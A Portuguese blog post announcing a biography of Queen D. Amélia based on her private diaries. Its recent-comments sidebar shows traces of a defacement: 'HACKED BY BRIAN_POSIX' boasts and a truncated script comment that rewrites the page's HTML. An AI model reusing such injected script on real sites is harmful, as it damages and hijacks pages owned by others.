Viajar nas Palavras @ 17:14

Sex, 24/05/13

José Alberto Ribeiro, diretor da Casa-Museu Dr. Anastácio Gonçalves, um apaixonado pela figura da rainha D. Amélia, traz-nos uma biografia reveladora de factos e acontecimentos até agora ignorados ou silenciados sobre a sua vida.

Após anos de pesquisa em arquivos nacionais e estrangeiros e da leitura dos diários privados da rainha, a que o autor teve acesso, faz-nos uma reconstituição da vida e do quotidiano de D. Amélia, da sua infância, do casamento, da relação com D. Carlos e com os filhos, dos seus gostos, da sua curiosidade pelas novidades da ciência, pela cultura e das suas acções de solidariedade, passando pelos seus desencantos e tristezas, o exílio forçado.

A rainha deixou expresso que após a sua morte estes diários deveriam ser queimados, o que não veio acontecer. José Alberto Ribeiro foi o único historiador a ter acesso, na sua totalidade, a estes diários, bem como a um conjunto de imagens desconhecidas. D. Amélia morre a 25 de outubro de 1951, na sua cama gravada com as armas de França e dos Bragança. Tinha então 86 anos. As suas últimas palavras foram: «Levem-me para Portugal, adormeço em França mas é em Portugal que quero dormir para sempre. No presente, Deus está comigo.»

Não perca a oportunidade de falar com o autor e conhecer melhor a vida da Rainha D. Amélia.

 



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO